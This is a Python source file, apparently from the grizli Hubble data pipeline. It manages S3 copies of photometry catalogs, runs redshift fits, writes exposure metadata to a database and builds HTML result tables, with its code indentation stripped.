res = pd.read_sql_query("select field_root as root, field_t_g800l, field_t_g102, field_t_g141, proposal_pi from charge_fields where nassoc < 200 AND log LIKE '%%inish%%' AND field_root LIKE 'j%%';", engine)['root'].tolist()
orig_roots = pd.read_sql_query('select distinct p_root as root from photometry_apcorr', engine)['root'].tolist()
count = 0
for root in res:
if root not in orig_roots:
#break
count += 1
print(count, root)
os.system('aws s3 cp s3://grizli-v1/Pipeline/{0}/Extractions/{0}_phot_apcorr.fits .'.format(root))
os.system('aws s3 cp s3://grizli-v1/Pipeline/{0}/Extractions/{0}_phot.fits .'.format(root))
if not os.path.exists('{0}_phot_apcorr.fits'.format(root)):
os.system('aws s3 cp s3://grizli-v1/Pipeline/{0}/Prep/{0}_phot_apcorr.fits .'.format(root))
os.system('aws s3 cp s3://grizli-v1/Pipeline/{0}/Prep/{0}_phot.fits .'.format(root))
if os.path.exists('{0}_phot_apcorr.fits'.format(root)):
grizli_db.add_phot_to_db(root, delete=False, engine=engine)
else:
if os.path.exists('{0}_phot.fits'.format(root)):
# Make the apcorr file
utils.set_warnings()
total_flux = 'flux_auto'
try:
obj = photoz.eazy_photoz(root, object_only=True,
apply_prior=False, beta_prior=True,
aper_ix=1,
force=True,
get_external_photometry=False,
compute_residuals=False,
total_flux=total_flux)
except:
continue
grizli_db.add_phot_to_db(root, delete=False,
engine=engine, nmax=500)
# 3D-HST
copy = """
aws s3 cp /Users/gbrammer/Research/HST/Mosaics/egs-mosaic_phot_apcorr.fits s3://grizli-v1/Pipeline/egs-grism-j141956p5255/Extractions/egs-grism-j141956p5255_phot_apcorr.fits --acl public-read
aws s3 cp /Users/gbrammer/Research/HST/Mosaics/egs-mosaic_phot.fits s3://grizli-v1/Pipeline/egs-grism-j141956p5255/Extractions/egs-grism-j141956p5255_phot.fits --acl public-read
"""
grizli_db.run_lambda_fits('egs-grism-j141956p5255', min_status=6, zr=[0.01, 3.2])
copy = """
aws s3 cp /Users/gbrammer/Research/HST/Mosaics/uds-mosaic_phot_apcorr.fits s3://grizli-v1/Pipeline/uds-grism-j021732m0512/Extractions/uds-grism-j021732m0512_phot_apcorr.fits --acl public-read
"""
grizli_db.run_lambda_fits('uds-grism-j021732m0512', min_status=6, zr=[0.01, 3.2])
# GDS
copy = """
aws s3 rm s3://grizli-v1/Pipeline/gds-grism-j033236m2748/Extractions/ --recursive --exclude "*" --include "gds-grism-j033236m2748_[0-9]*"
aws s3 rm s3://grizli-v1/Pipeline/gds-g800l-j033236m2748/Extractions/ --recursive --exclude "*" --include "gds-g800l-j033236m2748_[0-9]*"
aws s3 cp /Users/gbrammer/Research/HST/Mosaics/gds-mosaic_phot_apcorr.fits s3://grizli-v1/Pipeline/gds-grism-j033236m2748/Extractions/gds-grism-j033236m2748_phot_apcorr.fits --acl public-read
aws s3 cp s3://grizli-v1/Pipeline/gds-grism-j033236m2748/Extractions/gds-grism-j033236m2748_phot_apcorr.fits s3://grizli-v1/Pipeline/gds-g800l-j033236m2748/Extractions/gds-g800l-j033236m2748_phot_apcorr.fits --acl public-read
"""
grizli_db.run_lambda_fits('gds-grism-j033236m2748', phot_root='gds-grism-j033236m2748', min_status=6, zr=[0.01, 3.2], extra={'bad_pa_threshold': 10, 'use_phot_obj': False})
grizli_db.run_lambda_fits('gds-g800l-j033236m2748', phot_root='gds-grism-j033236m2748', min_status=6, zr=[0.01, 1.6], extra={'bad_pa_threshold': 10, 'use_phot_obj': False})
# GDN
copy = """
#aws s3 rm s3://grizli-v1/Pipeline/gds-g800l-j033236m2748/Extractions/ --recursive --exclude "*" --include "gds-g800l-j033236m2748_[0-9]*"
aws s3 rm s3://grizli-v1/Pipeline/gdn-grism-j123656p6215/Extractions/ --recursive --exclude "*" --include "gdn-grism-j123656p6215_[0-9]*"
aws s3 rm s3://grizli-v1/Pipeline/gdn-g800l-j123656p6215/Extractions/ --recursive --exclude "*" --include "gdn-g800l-j123656p6215_[0-9]*"
aws s3 cp /Users/gbrammer/Research/HST/Mosaics/gdn-mosaic_phot_apcorr.fits s3://grizli-v1/Pipeline/gdn-grism-j123656p6215/Extractions/gdn-grism-j123656p6215_phot_apcorr.fits --acl public-read
aws s3 cp s3://grizli-v1/Pipeline/gdn-grism-j123656p6215/Extractions/gdn-grism-j123656p6215_phot_apcorr.fits s3://grizli-v1/Pipeline/gdn-g800l-j123656p6215/Extractions/gdn-g800l-j123656p6215_phot_apcorr.fits --acl public-read
"""
grizli_db.run_lambda_fits('gdn-grism-j123656p6215', phot_root='gdn-grism-j123656p6215', min_status=6, zr=[0.01, 3.2], extra={'bad_pa_threshold': 10, 'use_phot_obj': False})
grizli_db.run_lambda_fits('gdn-g800l-j123656p6215', phot_root='gdn-grism-j123656p6215', min_status=6, zr=[0.01, 1.6], extra={'bad_pa_threshold': 10, 'use_phot_obj': False})
# 3D-HST G800L
copy = """
aws s3 rm s3://grizli-v1/Pipeline/egs-g800l-j141956p5255/Extractions/ --recursive --exclude "*" --include "egs-g800l-j141956p5255_[0-9]*"
aws s3 cp s3://grizli-v1/Pipeline/egs-grism-j141956p5255/Extractions/egs-grism-j141956p5255_phot_apcorr.fits s3://grizli-v1/Pipeline/egs-g800l-j141956p5255/Extractions/egs-g800l-j141956p5255_phot_apcorr.fits --acl public-read
"""
grizli_db.run_lambda_fits('egs-g800l-j141956p5255', phot_root='egs-grism-j141956p5255', min_status=6, zr=[0.01, 1.6], extra={'bad_pa_threshold': 10, 'use_phot_obj': False})
res = grizli_db.wait_on_db_update('egs-g800l-j141956p5255', dt=15, n_iter=120, engine=engine)
res = grizli_db.wait_on_db_update('uds-g800l-j021732m0512', dt=15, n_iter=120, engine=engine)
# UDS
copy = """
aws s3 rm s3://grizli-v1/Pipeline/uds-g800l-j021732m0512/Extractions/ --recursive --exclude "*" --include "uds-g800l-j021732m0512_[0-9]*"
aws s3 cp s3://grizli-v1/Pipeline/uds-grism-j021732m0512/Extractions/uds-grism-j021732m0512_phot_apcorr.fits s3://grizli-v1/Pipeline/uds-g800l-j021732m0512/Extractions/uds-g800l-j021732m0512_phot_apcorr.fits --acl public-read
"""
grizli_db.run_lambda_fits('uds-g800l-j021732m0512', phot_root='uds-grism-j021732m0512', min_status=6, zr=[0.01, 1.6], extra={'bad_pa_threshold': 10, 'use_phot_obj': False})
grizli_db.run_lambda_fits('egs-g800l-j141956p5255', phot_root='egs-grism-j141956p5255', min_status=6, zr=[0.01, 1.6], extra={'bad_pa_threshold': 10, 'use_phot_obj': False})
# Cosmos on oliveraws
copy = """
aws s3 rm s3://grizli-cosmos-v2/Pipeline/cos-grism-j100012p0210/Extractions/ --recursive --exclude "*" --include "cos-grism-j100012p0210_[0-9]*"
aws s3 cp /Users/gbrammer/Research/HST/Mosaics/Cosmos/cos-cnd-mosaic_phot_apcorr.fits s3://grizli-cosmos-v2/Pipeline/cos-grism-j100012p0210/Extractions/cos-grism-j100012p0210_phot_apcorr.fits --acl public-read
"""
grizli_db.run_lambda_fits('cos-grism-j100012p0210', min_status=6, zr=[0.01, 3.2], mag_limits=[17, 17.1], bucket='grizli-cosmos-v2')
os.system('sudo halt')
def set_column_formats(info, extra={}, convert_mtime=True, **kwargs):
"""
Set predefined format strings of table columns
Parameters
----------
info : `astropy.table.Table`
Data table, updated in place
extra : dict
Dictionary with extra format codes as values and column names as keys
convert_mtime : bool
If ``'mtime'`` column found in `info`, convert all time strings to
sortable ISO format with `~grizli.utils.ctime_to_iso`.
"""
# Print formats
formats = {}
formats['ra'] = formats['dec'] = '.5f'
formats['mag_auto'] = formats['delta_z'] = '.2f'
formats['chinu'] = formats['chimin'] = formats['chimax'] = '.1f'
formats['bic_diff'] = formats['bic_temp'] = formats['bic_spl'] = '.1f'
formats['bic_poly'] = '.1f'
formats['dlinesn'] = formats['bic_spl'] = '.1f'
formats['flux_radius'] = formats['flux_radius_20'] = '.1f'
formats['flux_radius_90'] = '.1f'
formats['log_pdf_max'] = formats['log_risk'] = '.1f'
formats['d4000'] = formats['d4000_e'] = '.2f'
formats['dn4000'] = formats['dn4000_e'] = '.2f'
formats['z_spec'] = formats['z_map'] = formats['reshift'] = '.3f'
formats['z_spec_dr'] = '.1f'
formats['t_g141'] = formats['t_g102'] = formats['t_g800l'] = '.0f'
formats['zwidth1'] = formats['zw1'] = '.3f'
formats['zwidth2'] = formats['zw2'] = '.3f'
formats['q_z'] = '.2f'
formats['dz'] = '.3f'
for k in extra:
formats[k] = extra[k]
for c in info.colnames:
if c in formats:
info[c].format = formats[c]
elif c.startswith('sn_'):
info[c].format = '.1f'
elif c.startswith('mag_'):
info[c].format = '.2f'
elif '_ujy' in c:
info[c].format = '.2f'
elif c.startswith('ew_'):
info[c].format = '.1f'
elif ('q_z' in c):
info[c].format = '.2f'
elif ('zw' in c) | ('z_map' in c):
info[c].format = '.3f'
elif ('chinu' in c):
info[c].format = '.1f'
elif c.startswith('bic_'):
info[c].format = '.1f'
elif c in ['z02', 'z16', 'z50', 'z84', 'z97']:
info[c].format = '.3f'
elif c[:4] in ['splf', 'sple']:
info[c].format = '.1e'
elif c.startswith('flux_') | c.startswith('err_'):
info[c].format = '.1e'
if convert_mtime & ('mtime' in info.colnames):
iso_times = [utils.ctime_to_iso(m, verbose=False, strip_decimal=True)
for m in info['mtime']]
info['mtime'] = iso_times
def query_from_ds9(ds9, radius=5, engine=None, extra_cols=['mag_auto', 'z_map', 'bic_diff', 't_g800l', 't_g102', 't_g141'], extra_query='', table_root='/tmp/ds9_query'):
"""
Make a table by running a query for objects based on a DS9 pan position
"""
from grizli import utils, prep
if engine is None:
engine = get_db_engine(echo=False)
ra, dec = np.cast[float](ds9.get('pan fk5').split())
dd = radius/3600.
dr = dd/np.cos(dec/180*np.pi)
min_cols = ['root', 'id', 'status', 'ra', 'dec']
colstr = ','.join(min_cols + extra_cols)
q = from_sql(f'select {colstr} '
f'from redshift_fit natural join photometry_apcorr '
f'where ra > {ra-dr} AND ra < {ra+dr}'
f' AND dec > {dec-dd} and dec < {dec+dd}' + extra_query,
engine)
tt = utils.GTable()
tt['ra'] = [ra]
tt['dec'] = [dec]
_idx, _dr = tt.match_to_catalog_sky(q)
q['_dr'] = _dr
q['_dr'].format = '.2f'
so = np.argsort(q['_dr'])
make_html_table(sync=None, res=q[so], use_json=False, table_root=table_root, sort_column=('_dr', 1))
comment = [f'{id}' for id in q['id'][so]]
prep.table_to_regions(q[so], table_root+'.reg', comment=comment)
return q[so]
def make_html_table(engine=None, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'd4000', 'd4000_e'], where="AND status >= 5 AND root='j163852p4039'", tables=[], table_root='query', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'], sort_column=('bic_diff', -1), fit_table='redshift_fit', verbose=True, get_sql=False, res=None, show_hist=False, extra_formats={}, use_json=True, use_join=False):
"""
"""
import time
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from grizli import utils
from grizli.aws import db as grizli_db
if engine is None:
engine = get_db_engine(echo=False)
if len(tables) > 0:
extra_tables = ','+','.join(tables)
else:
extra_tables = ''
if use_join:
query = "SELECT {0} FROM {1} NATURAL JOIN photometry_apcorr WHERE {2};".format(','.join(columns), fit_table, where)
query = query.replace('WHERE AND', 'AND')
else:
query = "SELECT {0} FROM photometry_apcorr, {3}{1} WHERE phot_root = p_root AND id = p_id {2};".format(','.join(columns), extra_tables, where, fit_table)
if get_sql:
return query
if res is not None:
info = res
else:
res = pd.read_sql_query(query, engine)
info = utils.GTable.from_pandas(res)
if verbose:
print('Query: {0}\n Results N={1}'.format(query, len(res)))
if 'cdf_z' in info.colnames:
info.remove_column('cdf_z')
for c in info.colnames:
if c.startswith('p_'):
try:
info.rename_column(c, c[2:])
except:
pass
all_columns = info.colnames.copy()
if 'idx' not in info.colnames:
idx = ['<a href="http://vizier.u-strasbg.fr/viz-bin/VizieR?-c={0:.6f}+{1:.6f}&-c.rs=2">#{2:05d}</a>'.format(info['ra'][i], info['dec'][i], info['id'][i]) for i in range(len(info))]
info['idx'] = idx
all_columns.insert(0, 'idx')
all_columns.pop(all_columns.index('id'))
set_column_formats(info, extra=extra_formats)
print('Sort: ', sort_column, sort_column[0] in all_columns)
if sort_column[0] in all_columns:
scol = info[sort_column[0]]
if hasattr(scol, 'mask'):
sdata = scol.filled(fill_value=-np.inf).data
else:
sdata = scol
so = np.argsort(sdata)[::sort_column[1]]
#info = info[so[::sort_column[1]]]
# PNG columns
AWS = 'https://s3.amazonaws.com/grizli-v1/Pipeline'
bucket = ['grizli-cosmos-v2' if r.startswith('cos-') else 'grizli-v1' for r in info['root']]
for ext in png_ext:
if ext == 'thumb':
subdir = 'Thumbnails'
print(ext, subdir)
elif ext == 'rgb':
subdir = 'Thumbnails'
else:
subdir = 'Extractions'
if 'png_{0}'.format(ext) not in info.colnames:
png = ['{0}_{1:05d}.{2}.png'.format(root, id, ext) for root, id in zip(info['root'], info['id'])]
if ext == 'rgb':
js = '<a href={0}/{2}><img src={0}/{1} onmouseover="this.src = this.src.replace(\'rgb.pn\', \'seg.pn\')" onmouseout="this.src = this.src.replace(\'seg.pn\', \'rgb.pn\')" height=200></a>'
paths = ['{0}/{1}/{2}'.format(AWS.replace('grizli-v1', buck),
root, subdir)
for buck, root in zip(bucket, info['root'])]
png_url = [js.format(path, p,
p.replace('.rgb.png', '.thumb.png'))
for path, p in zip(paths, png)]
info['png_{0}'.format('rgb')] = png_url
else:
info['png_{0}'.format(ext)] = ['<a href="{0}/{1}/{2}/{3}"><img src={0}/{1}/{2}/{3} height=200></a>'.format(AWS.replace('grizli-v1', buck), root, subdir, p) for buck, root, p in zip(bucket, info['root'], png)]
all_columns.append('png_{0}'.format(ext))
sortable = []
for c in all_columns:
if not hasattr(info[c][0], 'upper'):
sortable.append(c)
info[all_columns][so].write_sortable_html('{0}.html'.format(table_root), replace_braces=True, localhost=False, max_lines=1e5, table_id=None, table_class='display compact', css=None, filter_columns=sortable, buttons=['csv'], toggle=True, use_json=use_json)
if show_hist:
from matplotlib.ticker import FixedLocator, AutoLocator, MaxNLocator
xti = xt = np.arange(0, 3.6, 0.5)
loc = np.arange(0, 3.6, 0.1)
bins = utils.log_zgrid([0.03, 3.5], 0.01)
fig = plt.figure(figsize=[8, 4])
ax = fig.add_subplot(111)
ax.hist(np.log(1+res['z_map']), bins=np.log(1+bins), color='k',
alpha=0.2, label=table_root, normed=False)
clip = res['bic_diff'].values > 30
ax.hist(np.log(1+res['z_map'].values[clip]), bins=np.log(1+bins),
color='r', alpha=0.3, normed=False)
xts = ax.set_xticks(np.log(1+xt))
xtl = ax.set_xticklabels(xti)
ax.xaxis.set_minor_locator(FixedLocator(np.log(1+loc)))
ax.yaxis.set_major_locator(MaxNLocator(integer=True))
ax.set_xlabel('z_map')
ax.set_ylabel(r'$N$')
# Label to show line mis-id
dz_wrong = (6563.-5007)/5007
ax.plot(np.arange(5)*dz_wrong, np.ones(5)*ax.get_ylim()[1], marker='.', markerfacecolor='w', markeredgecolor='w', color='r', markersize=10)
ax.set_xlim(0, np.log(1+3.7))
ax.grid()
ax.legend(loc='upper right')
fig.tight_layout(pad=0.1)
fig.text(1-0.02, 0.02, utils.nowtime(), ha='right', va='bottom',
transform=fig.transFigure, fontsize=5)
fig.savefig('{0}_zhist.png'.format(table_root))
if sync:
os.system('aws s3 sync ./ {0} --exclude "*" --include "{1}.html" --include "{1}.json" --include "{1}_zhist.png" --acl public-read'.format(sync, table_root))
return res
def get_exposure_info():
"""
Get exposure information from the MAST databases
"""
import mastquery.query
master = 'grizli-v1-19.12.04'
master = 'grizli-v1-19.12.05'
master = 'grizli-v1-20.10.12'
tab = utils.read_catalog('{0}_visits.fits'.format(master))
all_visits = np.load('{0}_visits.npy'.format(master), allow_pickle=True)[0]
all_files = []
for v in all_visits:
all_files.extend(v['files'])
prog = [f[1:4] for f in all_files]
_res = np.unique(np.array(prog), return_counts=True)
t = utils.GTable()
t['prog'] = _res[0]
t['count'] = _res[1]
so = np.argsort(t['count'])
t = t[so[::-1]]
for pr in t['prog']:
if os.path.exists('{0}_query.fits'.format(pr)):
#print('Skip ', pr)
continue
print(pr)
try:
_q = mastquery.query.run_query(obs_id='[ij]{0}*'.format(pr))
_p = mastquery.query.get_products_table(_q)
except:
continue
_q.write('{0}_query.fits'.format(pr))
_p.write('{0}_prod.fits'.format(pr))
# Send to AWS
from grizli.aws import db
import pandas as pd
from astropy.table import Table
engine = db.get_db_engine()
files = glob.glob('*query.fits')
files.sort()
cols = ['obs_id', 'target', 'target_ra', 'target_dec', 't_min', 't_max', 'exptime', 'wavelength_region', 'filter', 'em_min', 'em_max', 'target_classification', 'obs_title', 't_obs_release', 'instrument_name', 'proposal_pi', 'proposal_id', 'proposal_type', 'sregion', 'dataRights', 'mtFlag', 'obsid', 'objID', 'visit']
for i, file in enumerate(files):
print(file)
_q = Table.read(file, character_as_bytes=False)
_q['proposal_id'] = np.cast[np.int16](_q['proposal_id'])
_q['obsid'] = np.cast[np.int64](_q['obsid'])
_q['objID'] = np.cast[np.int64](_q['objID'])
_q.rename_column('ra','target_ra')
_q.rename_column('dec','target_dec')
_q.rename_column('footprint', 'sregion')
df = _q[cols].to_pandas()
df.to_sql('mast_query', engine, index=False, if_exists='append', method='multi')
files = glob.glob('*_prod.fits')
files.sort()
cols = ['obsid', 'dataset']
for i, file in enumerate(files):
print(i, file)
_p = Table.read(file, character_as_bytes=False)
_p['obsid'] = np.cast[np.int64](_p['obsid'])
_p['dataset'] = [d[:-1] for d in _p['observation_id']]
df = _p[cols].to_pandas()
df.to_sql('mast_products', engine, index=False, if_exists='append', method='multi')
##########
# Exposure log
# Initialize, adding an array column manually for the footprints
v = all_visits[0]
N = len(v['files'])
fps = [np.array(fp.convex_hull.boundary.xy)[:, :-1].tolist() for fp in v['footprints']]
df = pd.DataFrame()
df['file'] = [f.split('_')[0] for f in v['files']]
df['dataset'] = [f.split('_')[0][:-1] for f in v['files']]
df['extension'] = [f.split('_')[1][:3] for f in v['files']]
df['filter'] = v['filter']
df['parent'] = v['parent']
df['awspath'] = v['awspath']
df['product'] = v['product']
df['filter'] = v['product'].split('-')[-1]
df['ra'] = [fp.centroid.xy[0][0] for fp in v['footprints']]
df['dec'] = [fp.centroid.xy[1][0] for fp in v['footprints']]
df['area'] = [fp.area*np.cos(df['dec'][i]/180*np.pi)*3600 for i, fp in enumerate(v['footprints'])]
# Make table
engine.execute('drop table exposure_log;')
df.to_sql('exposure_log', engine, index=False, if_exists='append', method='multi')
engine.execute('alter table exposure_log add column footprint float [];')
engine.execute('delete from exposure_log where True;')
engine.execute('ALTER TABLE exposure_log ADD COLUMN mdrizsky float;')
engine.execute('ALTER TABLE exposure_log ADD COLUMN exptime float;')
engine.execute('ALTER TABLE exposure_log ADD COLUMN expstart float;')
engine.execute('ALTER TABLE exposure_log ADD COLUMN ndq int;')
engine.execute('ALTER TABLE exposure_log ADD COLUMN expflag VARCHAR;')
engine.execute('ALTER TABLE exposure_log ADD COLUMN sunangle float;')
engine.execute('ALTER TABLE exposure_log ADD COLUMN gsky101 real;')
engine.execute('ALTER TABLE exposure_log ADD COLUMN gsky102 real;')
engine.execute('ALTER TABLE exposure_log ADD COLUMN gsky103 real;')
engine.execute('ALTER TABLE exposure_log ADD COLUMN persnpix integer;')
engine.execute('ALTER TABLE exposure_log ADD COLUMN perslevl real;')
_exp = db.from_sql("select distinct(file) from exposure_log", engine)
db_files = np.unique(_exp['file'])
charge = db.from_sql("select * from charge_fields", engine)
SKIP = 1000
df0 = None
for i, v in enumerate(all_visits):
_count = np.sum([f.split('_')[0] in db_files for f in v['files']])
if _count == len(v['files']):
continue
if v['parent'] not in charge['field_root']:
print('Warning: {0} not in charge["field_root"]'.format(v['parent']))
continue
print(i, v['parent'], v['product'], _count, len(v['files']))
N = len(v['files'])
fps = [np.array(fp.convex_hull.boundary.xy)[:, :-1].tolist() for fp in v['footprints']]
df = pd.DataFrame()
df['file'] = [f.split('_')[0] for f in v['files']]
df['dataset'] = [f.split('_')[0][:-1] for f in v['files']]
df['extension'] = [f.split('_')[1][:3] for f in v['files']]
df['filter'] = v['filter']
df['parent'] = v['parent']
df['awspath'] = v['awspath']
df['product'] = v['product']
df['filter'] = v['product'].split('-')[-1]
df['ra'] = [fp.centroid.xy[0][0] for fp in v['footprints']]
df['dec'] = [fp.centroid.xy[1][0] for fp in v['footprints']]
df['area'] = [fp.area*np.cos(df['dec'][i]/180*np.pi)*3600 for i, fp in enumerate(v['footprints'])]
df['footprint'] = fps
if df0 is None:
df0 = df
else:
df0 = df0.append(df)
if len(df0) > SKIP:
# Send to DB and reset append table
print('>>> to DB >>> ({0}, {1})'.format(i, len(df0)))
df0.to_sql('exposure_log', engine, index=False, if_exists='append', method='multi')
df0 = df[:0]
def update_all_exposure_log():
"""
Run all
"""
import glob
import numpy as np
from grizli.aws import db
from importlib import reload
reload(db)
config = db.get_connection_info(config_file='/home/ec2-user/db_readonly.yml')
engine = db.get_db_engine(config=config)
# DASH
#_files = db.from_sql("SELECT file from exposure_log WHERE mdrizsky is null AND file like 'icxe%%'", engine)
# COSMOS F160W
_files = db.from_sql("SELECT file, filter, awspath from exposure_log WHERE mdrizsky is null AND awspath like 'grizli-cosmos%%' AND filter like 'f160w'", engine)
# COSMOS F814W
#_files = db.from_sql("SELECT file, filter, awspath from exposure_log WHERE mdrizsky is null AND ABS(ra-150.1) < 0.6 AND ABS(dec-2.2) < 0.6 AND filter like 'f814w'", engine)
#_files = db.from_sql("SELECT file, filter, awspath from exposure_log WHERE mdrizsky is null AND ABS(ra-150.1) < 0.6 AND ABS(dec-2.2) < 0.6", engine)
### COSMOS grism
#_files = db.from_sql("SELECT file, filter, awspath from exposure_log WHERE mdrizsky is null AND ABS(ra-150.1) < 0.6 AND ABS(dec-2.2) < 0.6 AND filter like 'g1%%'", engine)
### All grism
#_files = db.from_sql("SELECT file, filter, awspath, mdrizsky from exposure_log WHERE mdrizsky is null AND filter like 'g1%%'", engine)
#db.update_exposure_log({'file':_files['file'][0], 'engine':engine, 'skip':False}, {})
# All IR
# _files = db.from_sql("SELECT file, filter from exposure_log WHERE mdrizsky is null AND filter like 'f0%%'", engine)
#
_files = db.from_sql("SELECT file, filter, parent from exposure_log WHERE mdrizsky is null AND filter like 'f%%'", engine)
_files = db.from_sql("SELECT file, filter, parent, product from exposure_log WHERE mdrizsky is null AND gsky101 is null", engine)
# Skip 3DHST
keep = _files['parent'] != 'xx'
for p in ['j123656p6215','j141952p5255','j033236m2748','j021740m0512']:
keep &= _files['parent'] != p
#_files = db.from_sql("SELECT file, filter from exposure_log WHERE mdrizsky is null AND awspath like 'grizli-cosmos%%' AND filter like 'f814w' LIMIT 10", engine)
# latest cosmos
_files = db.from_sql("SELECT file, filter, awspath from exposure_log WHERE mdrizsky is null AND awspath like 'cosmos-dash%%' AND filter like 'f160w'", engine)
N = len(_files)
idx = np.argsort(np.random.normal(size=N))
for i, file in enumerate(_files['file'][idx]):
print(f'\n {i+1} / {N}\n')
_ = glob.glob(f'{file}*')
if len(_) == 0:
db.update_exposure_log({'file':file, 'engine':engine}, {})
def update_exposure_log(event, context):
"""
Get exposure info from FITS file and put in database
Recognized `event` keywords (default):
'file' : file rootname in exposure_log, *required*
'keywords' : list of keywords to take from the Primary header
(['EXPFLAG','EXPTIME','EXPSTART','SUNANGLE'])
'dump_dq' : generate a compact DQ file and upload to S3 (True)
'remove': Remove the downloaded exposure file (True)
'skip': Don't do anything if 'mdrizsky' populated in database
"""
import os
import boto3
import astropy.io.fits as pyfits
from grizli import utils
if 'file' not in event:
print("'file' keyword not found in `event`")
return False
if 'keywords' in event:
keywords = event['keywords']
else:
keywords = ['EXPFLAG','EXPTIME','EXPSTART','SUNANGLE']
keywords += ['GSKY101', 'GSKY102', 'GSKY103', 'PERSNPIX', 'PERSLEVL']
kwvals = {}
if 'engine' in event:
engine = event['engine']
else:
engine = get_db_engine(echo=False)
_q = from_sql("SELECT * from exposure_log where file LIKE '{0}'".format(event['file']), engine)
if len(_q) == 0:
print('File {0} not found in `exposure_log`'.format(event['file']))
return False
if 'skip' in event:
skip = event['skip']
else:
skip = True
if (not hasattr(_q['mdrizsky'], 'mask')) & skip:
print('Info for {0} found in `exposure_log`'.format(event['file']))
return True
#
local_file = '{0}_{1}.fits'.format(_q['file'][0], _q['extension'][0])
s3 = boto3.resource('s3')
bucket = _q['awspath'][0].split('/')[0]
bkt = s3.Bucket(bucket)
awsfile = '/'.join(_q['awspath'][0].split('/')[1:]).strip('/')
awsfile += '/'+local_file
print(f'{bucket}:{awsfile} > {local_file}')
if not os.path.exists(local_file):
try:
bkt.download_file(awsfile, local_file,
ExtraArgs={"RequestPayer": "requester"})
except:
print(f'Failed to download s3://{bucket}/{awsfile}')
# Try other bucket path
if 'Exposures' in awsfile:
bucket = 'grizli-v1'
bkt = s3.Bucket(bucket)
awsfile = 'Pipeline/{0}/Prep/'.format(_q['parent'][0])
awsfile += local_file
try:
bkt.download_file(awsfile, local_file,
ExtraArgs={"RequestPayer": "requester"})
except:
print(f'Failed to download s3://{bucket}/{awsfile}')
return False
kwvals['awspath'] = f'{bucket}/{os.path.dirname(awsfile)}'
else:
return False
######### Update exposure_log table
im = pyfits.open(local_file)
kwvals['ndq'] = (im['DQ',1].data == 0).sum()
if 'MDRIZSKY' in im['SCI',1].header:
kwvals['mdrizsky'] = im['SCI',1].header['MDRIZSKY']
for k in keywords:
if (k in im[0].header) & (k.lower() in _q.colnames):
kwvals[k.lower()] = im[0].header[k]
set_keys = []
for k in kwvals:
if isinstance(kwvals[k], str):
_set = 'x = \'{x}\''
else:
_set = 'x = {x}'
set_keys.append(_set.replace('x', k))
sqlstr = ('UPDATE exposure_log SET ' + ', '.join(set_keys) +
" WHERE file LIKE '{0}'".format(event['file']))
print(sqlstr.format(**kwvals))
engine.execute(sqlstr.format(**kwvals))
im.close()
######### Compact DQ file
if 'dump_dq' in event:
dump_dq = event['dump_dq']
else:
dump_dq = True
if dump_dq:
utils.dump_flt_dq(local_file)
repl = ('.fits', '.dq.fits.gz')
print(f'{local_file} > {bucket}:{awsfile}'.replace(*repl))
try:
bkt.upload_file(local_file.replace(*repl),
awsfile.replace(*repl),
ExtraArgs={'ACL':'public-read'})
except:
print(f'Failed to upload s3://{bucket}:{awsfile}'.replace(*repl))
remove = True
if 'remove' in event:
remove = event['remove']
if remove:
print('Remove '+local_file)
if os.path.exists(local_file):
os.remove(local_file)
if dump_dq:
print('Remove '+local_file.replace(*repl))
if os.path.exists(local_file.replace(*repl)):
os.remove(local_file.replace(*repl))
return kwvals
def run_shrink_ramps():
from grizli.aws import db
_q = db.from_sql("select file, awspath, parent from exposure_log where extension LIKE 'flt' AND parent LIKE 'j002836m3311' limit 5", engine)
for i, (file, awspath, parent) in enumerate(zip(_q['file'], _q['awspath'], _q['parent'])):
shrink_ramp_file(file, awspath, parent, engine=engine, MAX_SIZE=2*1024**2, convert_args='-scale 35% -quality 90', remove=True)
def shrink_ramp_file(file, awspath, parent, engine=None, MAX_SIZE=2*1024**2, convert_args='-scale 35% -quality 90', remove=True):
"""
Make ramp.png files smaller with ImageMagick
"""
import os
import subprocess
import shutil
import boto3
import astropy.io.fits as pyfits
from grizli import utils
if engine is None:
engine = get_db_engine(echo=False)
local_file = '{0}_ramp.png'.format(file)
s3 = boto3.resource('s3')
bucket = awspath.split('/')[0]
bkt = s3.Bucket(bucket)
awsfile = '/'.join(awspath.split('/')[1:])
awsfile += '/'+local_file
awsfile = awsfile.replace('/Prep','/RAW')
print(f'{bucket}/{awsfile} > {local_file}')
if not os.path.exists(local_file):
try:
bkt.download_file(awsfile, local_file,
ExtraArgs={"RequestPayer": "requester"})
except:
print(f'Failed to download s3://{bucket}/{awsfile}')
# Try other bucket path
if 'Exposures' in awsfile:
bucket = 'grizli-v1'
bkt = s3.Bucket(bucket)
awsfile = 'Pipeline/{0}/RAW/'.format(parent)
awsfile += local_file
try:
bkt.download_file(awsfile, local_file,
ExtraArgs={"RequestPayer": "requester"})
except:
print(f'Failed to download s3://{bucket}/{awsfile}')
return False
else:
return False
print(f'{local_file:>25} {os.stat(local_file).st_size/1024**2:.2f}')
bw_file = local_file.replace('.png', '.sm.png')
if os.stat(local_file).st_size > MAX_SIZE:
subprocess.call(f"convert {convert_args} {local_file} {bw_file}",
shell=True)
print(f'{bw_file:>25} {os.stat(bw_file).st_size/1024**2:.2f}')
try:
bkt.upload_file(bw_file, awsfile, ExtraArgs={'ACL':'public-read'})
except:
print(f'Failed to upload s3://{bucket}/{awsfile}')
else:
print('skip')
if remove:
print('Remove '+local_file)
if os.path.exists(local_file):
os.remove(local_file)
if os.path.exists(bw_file):
os.remove(bw_file)
def get_exposures_at_position(ra, dec, engine, dr=10):
cosdec = np.cos(dec/180*np.pi)
res = from_sql('select * from exposure_log where (ABS(ra - {0}) < {1}) AND (ABS(dec-{2}) < {3})'.format(ra, dr/cosdec, dec, dr), engine)
return res
def add_irac_table():
from scipy.spatial import ConvexHull
os.chdir('/Users/gbrammer/Research/HST/CHArGE/FieldsSummary')
files = glob.glob('*ipac.fits')
files.sort()
bands = ['IRAC 3.6um', 'IRAC 4.5um', 'IRAC 5.8um', 'IRAC 8.0um', 'MIPS 24um']
bkey = {}
for b in bands:
key = b.replace(' ', '').replace('.', '')[:-2].lower()
bkey[key] = b
N = 0
data = {'field_root': []}
aor_data = {'field_root': [], 'reqkey': []}
for k in bkey:
data['exp_'+k] = []
data['n_'+k] = []
data['fp_'+k] = []
for i, file in enumerate(files):
tab = utils.read_catalog(file)
